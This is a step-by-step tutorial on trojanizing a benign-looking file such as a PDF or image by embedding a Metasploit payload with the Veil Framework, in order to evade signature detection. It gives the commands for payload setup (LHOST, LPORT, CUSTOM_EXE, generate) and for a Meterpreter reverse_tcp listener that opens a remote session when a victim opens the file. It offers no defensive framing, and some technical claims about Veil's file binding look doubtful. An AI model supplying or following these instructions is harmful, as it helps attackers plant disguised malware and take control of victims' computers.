Combining a Metasploit payload with a benign file type like an image, PDF, or MP3 is a technique designed to bypass signature-based detection and exploit human curiosity. This method, often facilitated by steganography or file binders, involves hiding the malicious executable within the structure of a seemingly harmless file. To begin this process using the Veil Framework, launch the tool by typing veil in your Kali Linux terminal. Once the main menu is active, enter use 1 to access the Evasion module. From the payload selection screen, list the available options and choose a payload that supports file binding or steganography capabilities. Payloads utilizing languages like C or Python are generally better suited for this, specifically those designed to inject shellcode into other processes rather than acting as standalone executables.
After selecting your payload, configure the essential network settings by entering set LHOST with your IP address and set LPORT with your listener port. The crucial step for binding is to locate the setting labeled CUSTOM_EXE or similar, depending on the chosen module. Instead of a standard executable, you will provide the path to your benign file, such as a PDF document or a JPEG image, for example, set CUSTOM_EXE /home/kali/Documents/report.pdf. When you type generate, Veil will attempt to embed the malicious shellcode within the legitimate file’s structure.
While Veil prepares the file, open a new terminal and launch the Metasploit console by typing msfconsole. Enter use exploit/multi/handler and set the payload to match the one you configured in Veil, for instance, set PAYLOAD windows/meterpreter/reverse_tcp. Set the matching LHOST and LPORT, then type exploit. When the target opens the modified file, the benign file may open normally in a reader application while the hidden shellcode executes silently in the background, establishing a Meterpreter session.
